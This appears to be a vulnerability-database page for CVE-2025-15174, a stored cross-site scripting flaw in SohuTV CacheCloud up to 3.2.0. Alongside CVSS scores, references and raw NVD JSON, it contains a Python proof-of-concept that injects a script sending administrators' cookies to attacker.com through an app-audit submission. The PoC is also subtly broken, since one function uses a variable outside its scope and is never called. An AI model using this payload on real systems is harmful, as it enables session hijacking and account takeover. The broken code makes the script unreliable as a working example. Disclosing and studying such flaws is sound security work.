CVE-2025-15174

Description

A security vulnerability has been detected in SohuTV CacheCloud up to 3.2.0. Affected by this vulnerability is the function doAppAuditList of the file src/main/java/com/sohu/cache/web/controller/AppManageController.java. Such manipulation leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:sohu:cachecloud:*:*:*:*:*:*:*:* - VULNERABLE

SohuTV CacheCloud <= 3.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2025-15174 PoC - SohuTV CacheCloud XSS in doAppAuditList
# Target: SohuTV CacheCloud <= 3.2.0

TARGET_URL = "http://target-server:8080"
USERNAME = "attacker_user"
PASSWORD = "password123"

def login():
    """Authenticate and obtain session cookie"""
    session = requests.Session()
    login_url = f"{TARGET_URL}/login"
    data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    response = session.post(login_url, data=data)
    return session if response.status_code == 200 else None

def inject_xss_payload(session):
    """Inject XSS payload via app audit submission"""
    # Malicious XSS payload
    xss_payload = "<script>fetch('https://attacker.com/log?c='+document.cookie)</script>"
    
    # Submit app audit with XSS payload
    audit_url = f"{TARGET_URL}/app/audit/submit"
    data = {
        "appName": "TestApp",
        "appDesc": xss_payload,
        "auditType": "create"
    }
    response = session.post(audit_url, data=data)
    return response.status_code == 200

def trigger_xss(session):
    """Trigger XSS by accessing audit list as admin"""
    # Admin views the audit list, triggering the XSS
    list_url = f"{TARGET_URL}/app/audit/list"
    response = session.get(list_url)
    return xss_payload in response.text

def main():
    session = login()
    if session and inject_xss_payload(session):
        print("[+] XSS payload injected successfully")
        print("[+] Payload will execute when admin views audit list")
    else:
        print("[-] Failed to inject payload")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15174
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15174
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15174/
[4] VulDB https://vuldb.com/cve/CVE-2025-15174
[5] https://github.com/sohutv/cachecloud/issues/370
[6] https://github.com/sohutv/cachecloud/issues/370#issue-3733566371
[7] https://vuldb.com/?ctiid.338559
[8] https://vuldb.com/?id.338559
[9] https://vuldb.com/?submit.716308

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15174", "sourceIdentifier": "[email protected]", "published": "2025-12-29T06:15:52.107", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in SohuTV CacheCloud up to 3.2.0. Affected by this vulnerability is the function doAppAuditList of the file src/main/java/com/sohu/cache/web/controller/AppManageController.java. Such manipulation leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sohu:cachecloud:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.2", "matchCriteriaId": "5185073B-FF21-405B-9765-755B5C25BEBF"}]}]}], "references": [{"url": "https://github.com/sohutv/cachecloud/issues/370", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/sohutv/cachecloud/issues/370#issue-3733566371", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://vuldb.com/?ctiid.338559", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338559", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.716308", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}